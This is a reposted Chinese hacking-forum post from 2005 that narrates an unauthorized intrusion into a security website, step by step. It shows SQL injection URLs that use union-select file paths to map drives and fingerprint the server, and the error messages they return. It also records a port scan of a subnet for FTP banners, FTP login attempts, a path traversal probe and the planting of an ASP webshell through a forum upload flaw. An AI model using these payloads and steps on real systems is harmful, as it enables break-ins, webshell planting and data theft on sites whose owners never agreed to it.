[转载]某安全站点入侵实录(页 1) - 网络攻防技术{ Hacking and Defence } - 脚本安全[ Web Application ] - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

exploit 2005-1-23 01:29

[转载]某安全站点入侵实录

来源：[url]http://www.juntuan.net/[/url]

[url]http://www.xxxxxx.net/safety/book/show.asp?id=1130%20union%20select%20[/url]*from%20test.mdb

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 找不到文件 'c:\windows\systemx\inetsrv\test.mdb'。

/safety/book/show.asp，行 12
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
[url]http://www.xxxxxx.net/safety/book/show.asp?id=1130%20union%20select%20[/url]*%20from%20..\..\..\..\..\boot.ini

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 找不到文件 'c:\boot.mdb'。

/safety/book/show.asp，行 12
----------------------------------------------------------------------
[url]http://www.xxxxxx.net/safety/book/show.asp?id=1021%20AND%20exists%20[/url](select%20*%20from%20admin)

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'

[Microsoft][ODBC Microsoft Access Driver] 丢失 ), ], 或项目在查询表达式 'id=1021 AND exists (select * from admin' 中。

/safety/book/show.asp，行 12
--------------------------------------------------------------
[url]http://www.xxxxxx.net/safety/book/show.asp?id=1130%20union%20select%20[/url]*from%20..\cmd.exe.a

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] Microsoft Jet 数据库引擎打不开文件'c:\windows\systemx\cmd.exe'。它已经被别的用户以独占方式打开，或没有查看数据的权限。

/safety/book/show.asp，行 12

-------------------------------------------------------------
[url]http://www.xxxxxx.net/safety/book/show.asp?id=1130%20union%20select%20[/url]*from%20D:\web\safety\index.asp.a

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 'D:\web\safety\index.asp'不是一个有效的路径。确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。

/safety/book/show.asp，行 12
------------------------------------------------------------------

[url]http://www.xxxxxx.net/safety/book/show.asp?id=1130%20union%20select%20[/url]*from%20c:\inetpub\wwwroot\index.asp.a

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 找不到文件 'c:\inetpub\wwwroot\index.asp'。

/safety/book/show.asp，行 12
--------------------------------------------------------

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 'd:\winnt\systemx\cmd.exe'不是一个有效的路径。确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。

/safety/book/show.asp，行 12

－－－－－－－－－－－－－－－－－－－－－－－－－－－

[url]http://www.xxxxxx.net/safety/book/show.asp?id=1130%20union%20select%20[/url]*from%20e:\winnt\systemx\cmd.exe.a

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 磁盘或网络错误。

/safety/book/show.asp，行 12

//没有E盘应该是只有C,D盘
----------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 'F:\test.mdb'不是一个有效的路径。确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。

/safety/book/show.asp，行 12

－－－－－－－－－－晕似乎有F盘但是为什么没有E盘？你问我我问谁去？－－－－
晕啊一直试到Z盘都是提示不是有效路径而不是磁盘或者网络错误晕死
也许就是只有C,D盘不管了－－－－－

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] Microsoft Jet 数据库引擎打不开文件'c:\windows\systemx\taskkill.exe'。它已经被别的用户以独占方式打开，或没有查看数据的权限。

/safety/book/show.asp，行 12

－－－－－确定是2003，晕－－－－－－－－－－－－－－－－－

[url]http://www.xxxxxx.net/safety/book/show.asp?id=1130%20union%20select%20[/url]*from%20c:\windows\systemx\xpsp1res.dll.a

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 找不到文件 'c:\windows\systemx\xpsp1res.dll'。

/safety/book/show.asp，行 12
换成那个xpsp2res.dll也没有呵呵应该不是xp吧真是的话我认倒霉算了

－－－－－－－确定系统版本win2003-------------------
以下是我得机子打了所有补丁呵呵截至当前
KB819696.log
KB823182.log  /*补丁只打到这里呵呵：）（2003年10月 MS03-041）
      Authenticode 验证中的弱点导致允许远程代码执行 (823182) */

KB823353.log
KB823559.log
KB824105.log
KB824141.log
KB825119.log
KB828035.log
KB828741.log
KB8x894.log
KB833407.log
KB8357x.log
KB837001.log
KB837272.log
KB839643-DirectX9.log
KB839643.log
KB839645.log
KB840315.log
KB840374.log
KB867801.log
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
[url]http://www.xxxxxx.net/safety/book/show.asp?id=1130%20union%20select%20[/url]*from%20c:\windows\kb819696.log.a

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 不可识别的数据库格式 'c:\windows\KB819696.log'。

/safety/book/show.asp，行 12

－－－－－－－－－－－－－－－－－－－－
扫描了下
218.x.x.33 80 -> NULL
218.x.x.25 80 -> NULL
218.x.x.1 80 -> NULL
218.x.x.65 80 -> NULL
218.x.x.129 80 -> NULL
218.x.x.169 80 -> NULL
218.x.x.182 80 -> NULL
218.x.x.183 80 -> NULL
218.x.x.193 80 -> NULL
218.x.x.190 80 -> NULL
218.x.x.225 80 -> NULL
218.x.x.54 80 -> NULL
218.x.x.53 80 -> NULL
218.x.x.49 80 -> NULL
218.x.x.44 80 -> NULL
218.x.x.27 80 -> NULL
218.x.x.28 80 -> NULL
218.x.x.2 80 -> NULL
218.x.x.11 80 -> NULL
218.x.x.6 80 -> NULL
218.x.x.13 80 -> NULL
218.x.x.77 80 -> NULL
218.x.x.58 80 -> NULL
218.x.x.101 80 -> NULL
218.x.x.99 80 -> NULL
218.x.x.102 80 -> NULL
218.x.x.100 80 -> NULL
218.x.x.98 80 -> NULL
218.x.x.106 80 -> NULL
218.x.x.109 80 -> NULL
218.x.x.107 80 -> NULL
218.x.x.108 80 -> NULL
218.x.x.114 80 -> NULL
218.x.x.115 80 -> NULL
218.x.x.116 80 -> NULL
218.x.x.119 80 -> NULL
218.x.x.130 80 -> NULL
218.x.x.113 80 -> NULL
218.x.x.141 80 -> NULL
218.x.x.143 80 -> NULL
218.x.x.163 80 -> NULL
218.x.x.162 80 -> NULL
218.x.x.165 80 -> NULL
218.x.x.166 80 -> NULL
218.x.x.x 80 -> NULL
218.x.x.233 80 -> NULL
218.x.x.236 80 -> NULL
218.x.x.234 80 -> NULL
218.x.x.235 80 -> NULL
218.x.x.237 80 -> NULL
218.x.x.238 80 -> NULL

好多登陆不了郁闷还是扫下21
D:\HACK\hack>dscan -T  218.x.x.1-218.x.x.255 21 200 /BANNER
Scaning 255 IP Using 200 Threads
218.x.x.119 21 -> "220 Serv-U FTP Server v5.0 for WinSock ready..."
218.x.x.141 21 -> "220 Serv-U FTP Server v4.0 for WinSock ready..."
218.x.x.116 21 -> "220 Serv-U FTP Server v5.0 for WinSock ready..."
218.x.x.109 21 -> "500 WinGate Engine Access Denied"
218.x.x.x 21 -> "220 svr2 Microsoft FTP Service (Version 4.0)."
218.x.x.54 21 -> "220 Serv-U FTP Server v4.0 for WinSock ready..."
218.x.x.130 21 -> "220 Serv-U FTP Server v5.0 for WinSock ready..."
218.x.x.218 21 -> "220 Serv-U FTP Server v5.0 for WinSock ready..."
218.x.x.237 21 -> "220 Serv-U FTP Server v5.0 for WinSock ready..."
218.x.x.234 21 -> "220 Serv-U FTP Server v4.0 for WinSock ready..."
218.x.x.238 21 -> "220 Serv-U FTP Server v5.0 for WinSock ready..."
218.x.x.70 21 -> "220 ld99 Microsoft FTP Service (Version 5.0)."
Scaned 255 IPs Complete In 0 Hours 0 Minutes 2 Seconds. Found 12 Hosts

D:\HACK\hack>FTP 218.x.x.x
Connected to 218.x.x.x.
220 svr2 Microsoft FTP Service (Version 4.0).
User (218.x.x.x:(none)): tfp
331 Password required for tfp.
Password:
^C
D:\HACK\hack>FTP 218.x.x.x
Connected to 218.x.x.x.
220 svr2 Microsoft FTP Service (Version 4.0).
User (218.x.x.x:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
^C
D:\HACK\hack>FTP 218.x.x.x
Connected to 218.x.x.x.
220 svr2 Microsoft FTP Service (Version 4.0).
User (218.x.x.x:(none)): srv2
331 Password required for srv2.
Password:
试了几个老是输完密码就没有反映了 ft 自己手工试这些有21的web看看怎么样
[url]http://218.x.x.116/asp1/open.asp?id=2626&path=mpxw&filename=200471374725.htm[/url]

嘿嘿似乎有问题哦我要使用..\..\..\例如[url]http://218.x.x.x/asp1/open.asp?id=2626&path=C:[/url]\&filename=boot.ini

呵呵直接出错 goback（－1）了注入也没戏嘿嘿看到了另外一个论坛的模样
看了下 upfil.asp 和 DVBBS版本似乎可以搞哈哈爽！上船了一个

_cat.asp">[url]http://218.x.x.x/bbs/uploadface/news_cat.asp[/url]
接着上传自己改过的一个好用的asp马

晕死不支持执行命令真是郁闷又没有什么用了似乎晕哦～
MD  测试了一下FSO 晕倒不知道这个BTadmin 搞什么妈的竟然不禁止FSO
确禁止了shell.aplication 呵呵好的有希望了先看下ip设置是否在通一个局域网呵呵

Autoconfiguration IP Address. . . : 218.x.x.x

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 218.x.x.x

太好了呵呵
看看管理员帐户只有administrator 呵呵 8。17号建的帐户9。1号登陆过一次
呵呵看来是个懒人晕死那就晚上干吧呵呵

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

[转载]某安全站点入侵实录